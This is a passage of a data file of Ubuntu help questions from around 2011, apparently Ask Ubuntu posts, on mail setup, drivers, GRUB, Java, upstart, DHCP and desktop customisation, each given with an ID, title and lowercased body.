88117	sending mails with php , lampp and postfix	i 've been trying for 2 whole days now , and i just ca n't get the most simple thing to work . the problem : sending emails from php to my email address does not work i 've been working with windows and sendmail ( sendmail was within the xampp package ) before and everything was ok . the xampp-package ( 1.7.7 ) for linux does n't have sendmail integrated though . so after googling around a little i found out that postfix fits better into a lampp-environment . what i have tried so far : i 've installed postfix and wanted to configure it to just use the smtp-server of my private email provider ( like it did on windows ) . so i 've confogured my php.ini like this : [ mail function ] ; for win32 only . ; smtp = localhost ; smtp_port = 25 ; for win32 only . ; sendmail_from = me @ example.com sendmail_path = /etc/postfix mail.add_x_header = on note that i 've commented out the `` win32 only '' -stuff . the /etc/postfix/main.cf looks like this : smtp_sasl_auth_enable = yes smtp_sasl_security_options = noanonymous smtp_sasl_password_maps = hash : /etc/postfix/sasl_password myhostname = ubuntu alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases sender_canonical_maps = hash : /etc/postfix/sender_canonical mydestination = ubuntu , localhost.localdomain , localhost relayhost = mail.gmx.net mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = loopback-only /etc/aliases is unchanged : # required aliases postmaster : root mailer-daemon : postmaster # common aliases abuse : postmaster spam : postmaster /etc/postfix/sasl_password : my.providers.smtp my_login : my_password /etc/postfic/sender_canonical : postmaster my.email @ ddress.com what happens : so when i do > sudo /etc/init.d/postfix start everything seems to work fine and the /var/log/mail.log says : `` ubuntu postfix/master [ 9720 ] : daemon started -- version 2.8.5 , configuration /etc/postfix '' but when i run my php-script ( which worked fine with windows and sendmail ) , it just runs through and nothing happens , not even an error is logged . what i actually want to achieve : i 'm working locally on an e-commerce website . it runs fine on the dedicated webserver , but i want to also have it running locally for obvious reasons . in some cases , it sends emails , and i just want to be able to receive them with thunderbird or in any other way . is using postfix overkill here ? i do n't need to receive emails - i just want to make the sent mails visible somehow . i could not seem to find any helpful step-by-step-tutorials for this issue ( neither concerning senmail nor postfix - but , to be honest , i 'm very new to linux ) .
88122	64 bit version of boinc client requires x while 32 bit version does not ?	i am attempting to install boinc-client on a few ubuntu server machines . however there 's one problem : with both depending on the same libraries ( just different architectures ) , one requires x while the other one does n't ? both servers a fairly vanilla with not much installed besides the base image . both are running ubuntu server 11.10 . command run was sudo apt-get install boinc-client 32 bit machine the following new packages will be installed : boinc-client libcurl3 64 bit machine the following new packages will be installed : boinc-client fontconfig : i386 ia32-libs ia32-libs-multiarch : i386 lib32asound2 lib32bz2-1.0 lib32ffi6 lib32gcc1 lib32ncurses5 lib32ncursesw5 lib32stdc++6 lib32tinfo5 libacl1 : i386 libasound2 libattr1 : i386 libaudio2 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libcups2 : i386 libcupsimage2 : i386 libcurl3 libcurl3 : i386 libdrm-intel1 : i386 libdrm-nouveau1a : i386 libdrm-radeon1 : i386 libdrm2 : i386 libexpat1 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcrypt11 : i386 libgdbm3 : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libgnutls26 : i386 libgpg-error0 : i386 libgssapi-krb5-2 : i386 libice6 : i386 libidn11 : i386 libjpeg62 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 liblcms1 : i386 libldap-2.4-2 : i386 libllvm2.9 : i386 libmng1 : i386 libnspr4 : i386 libnss3 : i386 libpciaccess0 : i386 libpng12-0 : i386 libqt4-dbus : i386 libqt4-declarative : i386 libqt4-designer : i386 libqt4-network : i386 libqt4-opengl : i386 libqt4-qt3support : i386 libqt4-script : i386 libqt4-scripttools : i386 libqt4-sql : i386 libqt4-svg : i386 libqt4-test : i386 libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 : i386 libqtgui4 : i386 librtmp0 : i386 libsasl2-2 : i386 libsasl2-modules : i386 libsm6 : i386 libsqlite3-0 : i386 libstdc++6 : i386 libtasn1-3 : i386 libtiff4 : i386 libuuid1 : i386 libx11-6 : i386 libxau6 : i386 libxcb1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxi6 : i386 libxrender1 : i386 libxss1 : i386 libxt6 : i386 libxxf86vm1 : i386 qdbus : i386 x11-common why is there such a difference between the 64 bit and 32 bit versions ? both use the same libraries , so adding other nonsense does n't make sense
88123	nautilus keeps remounting after i `` safely remove drive ''	why does nautilus automatically remount a usb drive when i clicked `` safely remove drive '' ? it powers it down nice , then just when i 'm about to unplug it , it reactivates it and remounts it ! oops ! now i just unplugged it while it was powering on.. smooth . is there a way to turn this off ? i already activated `` never prompt or start programs on media insertion '' , and it still does it .
88128	where is the config for samba 's user-created shares ?	i want to tune the permissions on a share i created as a user in nautilus . this share does not exist in /etc/samba/smb.conf and i ca n't see where it would be . edit : just found ~/.smb/smb.conf but this does n't contain any share information , just information , i suspect , that is used to connect to samba servers .
88129	wireless does n't work on an hp pavillion dv6000 with an intel 3945abg	so i just installed ubuntu 11.10 on my hp pavillion dv6000 and my wireless will not connect . i been searching all over the internet for answers so this is my last resort . nobody can quite figure it out i 've heard to get online and do updates cause i dont have a wired connection . it reads my wireless and ask for passphase and then just cant connect . it keeps popping up every minute or so asking for the password . i have a intel corporation pro/wireless 3945abg [ golan ] network controller . im new to ubuntu im using a mobile hotspot for my wireless i then went to edit connections found my hotspot then went to the wireless security it is wpa & wpa2 personal i made sure the passphase is right . the wierd thing is i upgraded from ubuntu 10.10 and the wireless worked fine on this computer . here is my information . trav @ trav-hp-pavilion-dv6000-rg360ua-aba : ~ $ sudo lshw -c network *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 02 serial : 00:18 : de:76:19:43 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.0.0-14-generic firmware=15.32.2.9 latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:43 memory : d6000000-d6000fff *-network description : ethernet interface product : pro/100 ve network connection vendor : intel corporation physical id : 8 bus info : pci @ 0000:05:08.0 logical name : eth0 version : 02 serial : 00:16:36 : a3:41:98 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=half firmware=n/a latency=64 link=no maxlatency=56 mingnt=8 multicast=yes port=mii speed=10mbit/s resources : irq:20 memory : d8000000-d8000fff ioport:4000 ( size=64 ) hardware information : http : //pastebin.com/enjxrd71 logs : http : //pastebin.com/y9s3ujmn
88130	unable to connect to airlive wireless ap through ethernet	this is crazy . i 've connected the airlive wl5460ap with an ethernet cable to the computer . the computer detects the access point , but does n't establish connection . the lan port is lan1 according to the manual . the service line told me to configure my pc with a specific ip address 192.168.100.xxx where xxx should n't be 252 ( reserved to the ap ) . i changed the /etc/network/interfaces file according to this link . but still , ubuntu 11.10 does n't connect . the service line told me to try with windows under vmware , but after trying , i think that vmware makes use of the underlying linux kernel . so , any idea how to establish connection to this linux unfriendly hardware ? oh , the idea i have is to have a universal repeater of the existing isp router signal . i also tried to wire the ap directly to the router , but without success ( maybe i should have used a special lan port ) .
88134	what are the differences between `` gtk theme '' and `` window theme '' in tweak tools ?	both advanced settings ( gnome-tweak-tool ) and ubuntu tweak refer to `` window theme '' and `` gtk theme '' . what are the nuances between these two settings ? where can i find a discussion of this ?
88137	how can i move the dash button from the unity launcher to the top panel ?	in ubuntu 11.10 the unity dash button moved from top-left corner to the launcher . how can i restore the dash button to the top-corner , as pictured below
88143	launcher for zenmap ( or nmapfe ) as sudo	i 've installed nmap , and also nmapfe . by default these are not set up to run as root ; however , the tasks i need to run require it . i am able to run sudo nmapfe from terminal ; however , if i create a launcher for this , it does n't run . what am i doing wrong ?
88147	is there a way to have sound balance affected by window position ?	i think it would be great it i could control the sound balance by placing a window in different places on my desktop . for example , i could put a youtube video playing on the left-hand side , and hear it out of the left speaker . simultaneously , i could be playing a game on the right-hand side that i 'd hear through the right speaker . is there anything i can do to get this behaviour ?
88148	why did my install all of a sudden get really slow ?	it is just running really sluggish , and slow ... kinda reminds me of when i work on windows computers that are full of virii.. any ideas or suggestions ? let me know if you need any more information . also , my computer usually runs pretty fast , i have linux mint , and windows installed on the same pc and they run fine ...
88154	how can i restore a broken theme in gnome shell ?	my gui has changed into some crappy looking theme , i do n't know why it happened and i want to get the default looks back ! it happened after i was mucking around trying to get the purple grub menu splash to go away , so that i could see dmesg during boot , and i followed the instructions in this accepted answer to do sudo apt-get remove plymouth-theme-* and reboot . unfortunately , now i 've got an ugly gnome and ironically the bootloader splash screen remained anyway . of course i first tried sudo apt-get install plymouth-theme-ubuntu-logo plymouth-theme-ubuntu-text , which were the two that got removed by the previous step , but even after reboot it was still the ugly gnome . next i tried gnome-tweak-tool but it was all set to ambiance theme which should be correct . and then i tried lxappearance app which looked promising but did n't fix the problem either . how can i get my old window and icons looks back ? desktop forgets theme ? does n't work for me
88156	jerky/laggy scrolling	i run 11.10 with unity , nvidia quadro nvs 140m with driver 280.13 . in a fresh session , graphics performance is ok . however , after a while or with some open applications , 2d-scrolling performance degrades heavily . scrolling through a 800-line text file takes half a minute , with frequent freezes in the process , rendering any text editing mostly unusable for me . interestingly , i can run two full screen hd videos with both the videos and text scrolling in geany seemingly unaffected . on the other hand , as soon as i open any another application that involves 2d-scrolling ( browser , terminal , text editor , ... ) , it gets all incredibly jerky and laggy - only the scrolling , general performance is still acceptable . in unity-2d , things are ok so i guess the culprit may be compiz . is this a bug or just expected on a not-high-end graphics card ? i do n't expect silky-smoothness here but , seriously , no usable text-scrolling ?
88157	how can i disable the purple bootloader splash at boot ?	this question has been answered before , but neither of the methods in the accepted answer worked for me on 11.10 . first i tried editing in /etc/default/grub , and then running sudo update-grub . but after that i still got a blank , plain , purple screen while the kernel is loading . the screen has no boot options , and it obscures those dmesg that i want to see going in the terminal . next i tried removing the plymouth-theme-* , but that just broke my gnome-shell theme looks , and the purple screen still remains . i have also tried configuring it with startupmanager package , but nothing seems to get rid of that darned purple splash . here are the contents of my /etc/default/grub file : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' 0 '' grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 0 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' # grub_cmdline_linux_default= '' '' grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode= '' 640x480 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' grub_disable_os_prober= '' true ''
88160	installing oracle java jre 7 , terminal command not recognizing moved file	i 'm having a small problem . i 've been trying to work minecraft into working using wine . over the past few hours , i 've been working with java over and over ( long story , i 'll keep it relevant ) and have finally come to an answer . i need to install oracle java , or sun-jre as more commonly known . i found this answer http : //askubuntu.com/a/56119 and followed the instructions . i changed the file name where need-be in the commands for the newer version , placing the extracted file into /usr/lib/jvm but when i type this command : sudo update-alternatives -- config java i am met with this : there are 2 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-6-openjdk/jre/bin/java 1061 auto mode 1 /usr/lib/jvm/java-6-openjdk/jre/bin/java 1061 manual mode * 2 /usr/lib/jvm/java-7-openjdk-i386/jre/bin/java 1051 manual mode press enter to keep the current choice [ * ] , or type selection number : this confuses me , as i followed the steps in the answer linked previously by copy/pasting and editing for the file name . the name of the file i used is linux x86 32.25 mb jre-7u2-linux-i586.tar.gz . the ls -ld command returned the following : ls -ld /usr/lib/jvm/* lrwxrwxrwx 1 root root 14 2011-09-27 12:25 /usr/lib/jvm/default-java - > java-6-openjdk lrwxrwxrwx 1 root root 14 2011-10-22 01:14 /usr/lib/jvm/java-1.6.0-openjdk - > java-6-openjdk lrwxrwxrwx 1 root root 19 2011-10-21 19:24 /usr/lib/jvm/java-1.7.0-openjdk-i386 - > java-7-openjdk-i386 drwxr-xr-x 5 root root 120 2011-12-16 02:35 /usr/lib/jvm/java-6-openjdk drwxr-xr-x 3 root root 60 2011-12-16 02:35 /usr/lib/jvm/java-7-openjdk-common drwxr-xr-x 5 root root 120 2011-12-16 02:35 /usr/lib/jvm/java-7-openjdk-i386 drwx -- -- -- 6 ubuntu ubuntu 240 2011-11-17 21:39 /usr/lib/jvm/jre1.7.0_02 any help is appreciated , and thanks in advance .
88163	can gtk2 themes be converted to gtk3 themes ?	i really do n't like the stock gtk3 themes and have never found one i like . i do however have a few gtk2 themes i really like . can these gtk2 themes be ported to gtk3 or made to work in 11.10 ?
88169	is there no way to set sound to default to mute in gnome-classic ?	on my laptop i run ubuntu 11.10 with gnome classic . whenever i log in , the volume is set to around 50 % . i often use my laptop at cafes and portable hotspots where i do n't want to disturb others with any sounds . when i set the volume to zero using the applet in the gnome panel , it does not remember the setting . at next startup , the volume is back to 50 % . there is no `` mute '' checkbox , and there does n't seem to be anywhere to set the default behaviour to be mute . is there a way to force the sound to be off by default ?
88177	error setting permissions : read only file system on local drives	i installed ubuntu 11.10 recently , alongside windows xp . i ca n't change the file access permissions for the other local drives except for the root folder , i am not able to delete/create/modify anything from the other local drives , & i have got 4 partitions ( other than root ) in ntfs formats . this is the error message being displayed : sorry , could not change the permissions of `` softwares '' : error setting permissions : read-only file system . where `` softwares '' is the name of the partition . how could i fix it ? would be glad to get some help .
88179	can not open files from cd burned in ubuntu	i have burned a dvd in ubuntu some time ago from a machine i longer have . the disk contains images and pdf files . i have tested that the disk was working properly on ubuntu but when i try to open it from windows machines all files appear unrecongized . the file structure is readable but the files are not recognized ( can not be opened ) by the applications . i have tried data recovery software but no use . is there any way i can retrieve my files ?
88181	mms : // microsoft media server ( mms ) on ubuntu	i am trying to experiment the mms : // protocol on linux . not necessarily i need to stream any media but i like to see the request query logs , headers , etc from a client . basically , i have an html tag in test webpage like this : < asx version= '' 3.0 '' > < entry > < ref href= '' mms : //my_ubuntu_server : port/test.wmv '' / > < /entry > < /asx > is it possible to implement such a protocol in linux environment ? thank you , niz
88184	unable to mount iphone unhandled lockdown error	i get this error when plugging in my iphone 3gs . what does it mean ?
88186	how can i debug ubuntu 's kernel ?	how can i debug ubuntu 's kernel ? are there any debug symbols available , or should i recompile the kernel with debug info ?
88187	ca n't see ipod , even in lsusb output	just installed 11.10 64-bit hooked up ipod touch 2nd gen , and nothing . os does n't attempt to mount it , and opening a terminal and running lsusb results in it listing every device connected to my usb ports , except the ipod . i have tried different ports , and confirmed that the cable works by charging through a wall usb adaptor . need some help here guys hardware : mobo : asus m4a78-e hdd : wd velociraptor 300 gb 10k rpm vga : ati radeon hd 5870 lsusb results : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 005 : id 046d:0992 logitech , inc. quickcam communicate deluxe bus 004 device 002 : id 046d : c048 logitech , inc. g9 laser mouse bus 004 device 003 : id 06a3:0728 saitek plc bus 003 device 002 : id 046d:0a17 logitech , inc. g330 headset dmesg | tail output is : [ 13.788440 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.788441 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 15.599944 ] ext4-fs ( sdb5 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 24.080024 ] wlan0 : no ipv6 routers present [ 25.120004 ] ehci_hcd 0000:00:12.2 : force halt ; handshake ffffc9000064a824 00004000 00000000 - > -110 [ 25.120004 ] ehci_hcd 0000:00:12.2 : hc died ; cleaning up [ 25.120013 ] can not submit datapipe for urb 1 , error -19 : no device [ 25.120571 ] usb 1-2 : usb disconnect , device number 3 [ 25.120752 ] usb 1-4 : usb disconnect , device number 4 [ 26.164037 ] timeout : still 1 active urbs..'
88188	how does the ubuntu license work for commercial use ? do we have to follow the lgpl or the gpl ?	i have an ubuntu computer . once ubuntu starts i use my applications , such as : driving school exams , learning , practical use , and studying . now , i am preparing license documentation . if i use ubuntu commercially , what license do i have to apply ? i have not changed any of ubuntu 's source code . i 've installed ubuntu and i use for commercial purposes . my ubuntu installation will be used for teaching driving in europe . when ubuntu starts , it starts my application to teach drivers and give them exams and practice . they can also return the box for new exams and updates . what happens for with regard to the license terms when i sell such pcs with embedded ubuntu and my application pre-installed ? ( they use x11vnc , vim , gcc , etc . and many other tools but no source code is modified . i wrote my application in bash , php , and java )
88191	how to solve extend monitor problem on my laptop ?	i installed 10.10 on my laptop and the microphone and wlan did n't show up . i then built the latest linux core and installed it . everything is okay now , except of the external monitor . if i plug in a vga monitor and configure it using system â preference â monitors , and then close the lid , it goes black and the external screen fails to operate . my workaround for now : unplug ac cable , close the lid and reopen it , plug in the vga monitor . there seems to be something wrong with my config . how to solve it ? i 've no /etc/x11/xorg.conf , here 's the output of xrandr : screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 lvds1 connected ( normal left inverted right x axis y axis ) 1366x768 60.0 + 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 510mm x 287mm 1920x1080 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1
88192	what 's up with the fontmatrix project ?	i 'm quite fond of fontmatrix , but it seems to be `` dead '' - at least the site of the project is down . does anyone have information about that , or a possible fork that i should start to use etc . ?
88198	screen tearing while watching video	i have a bad tearing while watching video in ubuntu 11.10 . i tried to use both smplayer and vlc , but none of them helped . in fact i see tearing only in rips , there is not such problem while watching blu-ray movies . though maybe i 'm just not very attentive . can anybody help me with this ? i have 32-bit version of ubuntu . videocard is gtx460 768mb . i use hardware acceleration in players ( vdpau ) . enabling vsync in ccsm does n't help .
88201	what is debugging and how do i get involved ?	well what is it ? and how do i get involved ?
88205	how to install jboss7 to run as a service ?	how to run jboss ( preferably jboss 7 ) as a service on ubuntu ? i can run jboss using its sh file e.g . sh /jboss/bin/run.sh . but i can not monitor it like tomcat /etc/init.d/tomcat start|stop|restart .
88211	limit what users can install	this is a theoretical scenario that has come up as part of another question : i have x ubuntu desktops with x users . users do n't have sudo privs i can let them install things through the software center by editing the policy kit rules but that would let them install anything ( inc games ) which is not desirable . i 'm wondering if there 's a hack that would be able to limit what sorts of things a user can install . packages have a `` section '' ( eg games ) so i was wondering if it would be possible to force apt to ignore a whole section of packages . or perhaps a way of setting up an apt proxy that does this filtering . changes can be global ( eg even somebody with sudo privs wo n't be able to install games ) . any ideas welcome . before you leave a comment telling me people could just bring their own debs with them , or download tars from the internet and run them that way , please remember this a theoretical situation . if it means you 'll focus on the question , pretend that my users are n't allowed usb mounts , ca n't execute things in ~/ and do n't have write permissions outside their home . it 's locked down . and yes , all of that can be done .
88214	using libnotify from a daemon started with upstart	i have a python script that gets messages from an mqtt server and parses them to display using libnotify . this works fine when i run it from a terminal , but when i run it using upstart i get no notification bubbles . i assume because it does n't understand which x display and xauthority file to use . when i did something similar with cron i had to set it up as */10 * * * * display=:0.0 xauthority=~/.xauthority notify-send `` do n't forget '' `` you 're awesome '' i assume i need to do something similar with upstart to make this work ? or is there a way to get libnotify to broadcast to all xscreens or somesuch ? thanks for any advice or pointers
88215	secondary keyboard shortcuts in gnome	is there a way to set a secondary keyboard shortcut for a certain action ( say , `` volume up '' ) ?
88221	does ubuntu support bluetooth 3.0 ?	i am running 11.10 on my thinkpad e420 , and it has integrated bluetooth 3.0 , yet when i use my plantronics backbeat 903+ ( which uses bluetooth 2.1 ) i get terribly inconsistent audio with many complete dropouts . i also have a usb bluetooth 2.1 dongle , and when i attach that and use it instead of my internal adapter i get perfect audio quality . this is why i am curious as to whether or not ubuntu has bluetooth 3.0 support . any thoughts ?
88226	ubuntu upstart script execute a script.py program	i 'm creating an upstart script to execute a python program i 've written . when the service is starting i want to echo starting service - script.py ... and echo the process id of the program once started . likewise i want to echo stopping service - script.py ... when it is being stopped . i have this so far ( remember i 'm new to this ) ... # name : script.conf description `` an upstart config to run ~/applications/systems/script.py as an os service . '' author `` corey f. - 12/2011 '' pre-start script echo 'starting service - script.py ... ' end script post-stop script echo 'stopped service - script.py ... ' end script start on runlevel [ 2534 ] stop on runlevel [ ! 2534 ] exec /home/lv_admin/applications/systems/script.py respawn i think i need the command 2534 status to get the processid and last known state of the service ( as explained here : http : //upstart.ubuntu.com/getting-started.html ) but i 'm not sure where to put it ... also , how would i log upstart event problems to a specific file during this execution of this script.conf upstart file ? i need to know if upstart has issues starting the process .
88242	change icon order in unity 2d in ubuntu 11.10	how do you rearrange the order of icons in the dock in unity 2d in ubuntu 11.10 ? i searched and saw a post that said the order can be changed by pulling the icon to the right and dragging it , but i think that might have been for the regular unity because it does not seem to work for me . i see that i can remove items from the dock , but what i want to do is move chrome and terminal to the top . i 'm sure it 's possible , but it 's surprising that such a simple task seems so hard . i assume i must be overlooking something easy .
88243	how to change cursor in ubuntu 11.10 `` gnome classic ''	i do n't like how the cursor looks when pointing to web browser links . how can i change it - only this one or the whole cursors theme ?
88249	fan speeds up and slows down annoyingly on a dell latitude 5520	i ' ve just bought a dell latitude 5520 and installed 11.10 , my trouble is that the fan is noisy which is not regular . it is quiet for 1 minute and then speeds up and slows down every 4 seconds for 1 minute : it 's very annoying . i tried i8fan things on the internet but i did n't solve my problem , it seems to work better in windows 7 but i do n't use it a lot . dell technician came and changed the motherboard and the fan but it 's still the same . i have to put music on when i 'm on my computer ... anyone have the same problem or a solution ?
88250	dhcp server only works one time	i installed e configured the dhcp server and removed all network-manager* . all my settings are just like this one : dhcpd fails to start on eth1 ( but i use eth0 ) i do : sudo ifdown eth0 sudo ifup eth0 then plug the cable between the server and the client . the client receives the correct ip address : 192-168.0.50 but , if i unplug the cable and put it back the client does n't receive a valid ip address . i have to make sudo ifdown eth0 , sudo ifup eth0 at the server to the client receive a valid ip address again . how do i fix this ? edit : my current configuration files are : $ cat /etc/default/isc-dhcp-server interfaces= '' eth0 '' , $ cat /etc/dhcp/dhcpd.conf ddns-update-style none ; default-lease-time 600 ; max-lease-time 7200 ; subnet 192.168.0.0 netmask 255.255.255.0 { interface eth0 ; range 192.168.0.50 192.168.0.100 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.0.255 ; option routers 192.168.0.1 ; } , $ cat /etc/network/interfaces auto eth0 iface eth0 inet static address 192.168.0.1 network 192.168.0.0 netmask 255.255.255.0 broadcast 192.168.0.255 # gateway 192.168.0.1 , $ cat /etc/resolv.conf nameserver 192.168.0.1 i 'm not using any router or switch . just two pcs connected my cable . after rebooting the server , i have to $ sudo isc-dhcp-server start after this the client pc obtains a correct ip . but if i unplug the cable and connect it again , it wo n't get an ip in the correct range . i have to ifdown and then ifup eth0 .
88255	general internet slow on ubuntu 11.10 if running standalone but not inside vm	i got a new machine for work and was already using ubuntu before that with a chain loader setup to load windows 7 on another disk . my employer likes that cause he can just rip out the ubuntu disk and no trace is left of it . my most recent problem is that he wanted to limit the reboots from windows to ubuntu so he asked me to setup myself as a vmware vm . i used the second physical disk to install all my stuff directly on the disk and it was working quite well , just as it was before on my old machine . i decided this morning to boot directly into ubuntu and try it out outside of the vm cause the vm made my ubuntu kinda slow to work with . but since i rebooted in ubuntu , compared to my last machine , network access is horribly slow . it can be a windows share , the internet in general , it takes a lot of time to resolve names , about 10s and if i want to browse a server share ( where all our projects are located for instance ) i can take up to 2-3 minute to get a listing of the files on the main share ( contains all our client 's folders , around 500 folders ) needless to say this is really not productive : ) it does n't seem to happen when i 'm in the vm in bridged networking but here in standalone mode , same machine , same hard disk , same os , just not virtualized , everything seems more slugish in terms of internet ... can anyone help out ?
88256	create bookmarks in pdf	i 've noticed that when viewing some pdfs in evince some of them have a index in the left side of evince where items are clickable . well i want to build something like that for one pdf is that possible in ubuntu ? like this
88257	what type of path in bash is more preferable	in bash file first line should specify the path to interpreter . but on different servers linux , unix , or bsd this path could be different . what is more preferable # ! /usr/bin/env bash or # ! /bin/bash
88258	i ca n't start up because root filesystem is full	when i try starting up ubuntu 10.04 i get stuck at this screen which is essentially a log in screen but with out the styling of my custom theme . i guess it is running in low graphics mode ? anyways when this log in screen appears i see a message pop up for like 15 seconds in the top right hand corner that reads install problem the configuration defaults for gnome power manager have not been installed correctly . please contact your computer administrator . i will now mention what occurred before my ubuntu 10.04 would not boot up properly . what i remember doing was installing mongodb via these instructions . i added the gpg key by running sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv 7f0ceb10 and then i added the following line to my /etc/apt/sources.list deb http : //downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen after this i completed the installation by running the following commands in terminal sudo apt-get update sudo apt-get install mongodb-10gen while i was going through this process package updater popped up saying that it had a bunch of stuff to update . i remember google chrome was in the list . i believe i clicked the install updates button and off it went . i do not remember if it ever finished updating . i do remember mongodb installed and after it was done things got weird . the first thing that was out of place was that a message window popped up saying the volume âfilesystem rootâ has only 1mb bytes disk space remaining you can free up disk space by removing unused programs or files , or by moving files to > another disk or partition i clicked examine and disk utility popped up with a kind of pie chart of my disk use . i believe it read that 100 % of my disk space was being used . i was like 'what the hell ? i did not just dump huge multi gigabyte files on my hd ' or did i ? i ask this because later on in the # mongodb irc chat one of the people there told me that mongodb 's server needs 10gb of space to run and that it starts running right after it gets installed . also i noticed that i could not get google chrome to open from clicking the icon or via terminal with the command google-chrome when i tried to start chrome in terminal i got and error almost identical to this one $ google-chrome $ [ 4311:4311:95679337296 : error : process_singleton_linux.cc ( 250 ) ] failed to unlink /home/byers/.config/google-chrome/singletonlock : read-only file system [ 4311:4311:95679337571 : error : process_singleton_linux.cc ( 265 ) ] failed to create /home/byers/.config/google-chrome/singletonlock : file exists [ 4311:4311:95679337706 : error : process_singleton_linux.cc ( 250 ) ] failed to unlink /home/byers/.config/google-chrome/singletonlock : read-only file system [ 4311:4311:95679337746 : error : browser_main.cc ( 1650 ) ] failed to create a processsingleton for your profile directory . this means that running multiple instances would start multiple browser processes rather than opening a new window in the existing process . aborting now to avoid profile corruption . i assume chrome needs more space to run . does anyone have any idea how to solve this problem ? udpate i opened up terminal and ran df -h and it spit out a table like this https : //plus.google.com/photos/113556551990494099731/albums/5686800614437722049 ? authkey=cluh2cbdlp2piq so it looks like my /dev/sda5 partition is in full use .
88260	installing/upgrading gcc compilier for testing c++	i have ubuntu 10.10 , and i have been learning c++ lately on it . i originally installed the gcc compilier via the command : sudo aptitude install build-essential i would like to start learning/testing the newer c++ features and i think it would be best to have the latest version of gcc installed . im just needing some advice on this . is it possible to put a newer version of gcc in a separate folder that i can use for testing ? or is it possible/should i upgrade the current running version of gcc compilier
88265	how to find the latest version of redis-server in repos ?	i need to learn how to search for packages for 'redis-server ' and also what version they various repo 's have ? i know to add a repo i add it to /etc/apt/source.list and sometimes i have to add a key . ( btw , why do you have to add a key to fetch from a repo ? )
88267	how to add an item to desktop right-click menu ?	i 'm trying to add an item to the nautilus context menu that would launch gnome-tweak-tool . using nautilus actions config tool i 've managed to add the item , however i want it to appear only when i right-click on the desktop , not in all folders . could anyone please help me ?
88271	why does custom launcher behavior differ in the dash and other means of launching ?	i created a custom launcher to launch a web app ( e.g. , bit.ly ) as a chromium single-site browser complete with separate chromium profile and separate icon . ( i also created a new category in /etc/xdg/menus/applications.menu , referenced the new category in my launcher file , and the classicmenu indicator does reflect this correctly , while the dash ignores the new category . ) then i placed the .desktop launcher in ~/.local/share/applications so that it could be found by both the dash and the classicmenu indicator . i also made a separate `` web apps '' launcher for the unity dock , from which to launch multiple web apps ( all listed in a static quicklist ) . in this case , i experimented with the `` exec= '' line by trying both the actual command to execute , as well trying the previously created .desktop launcher specifically for bit.ly . ( referencing the .desktop file in the `` exec= '' line did n't work for me . ) launching the bit.ly app from the dash was the only method which showed a separate icon in the unity dock , rather than treating it as an additional chromium window . i examined a launcher from /usr/share/applications ( e.g. , filezilla ) which is launched by both the dash and the classicmenu indicator with it 's own icon , but i did n't see anything unique in that file to add to my own bitly file . is there any line i can add to my custom chromium apps launchers that will cause the menu system to launch them as separate apps , rather than more chromium windows ? the thing is , i do n't always want to have to remember what apps i 've made launchers for , and thus have to search for them . i 'd like browsing option too . furthermore , i do n't want to 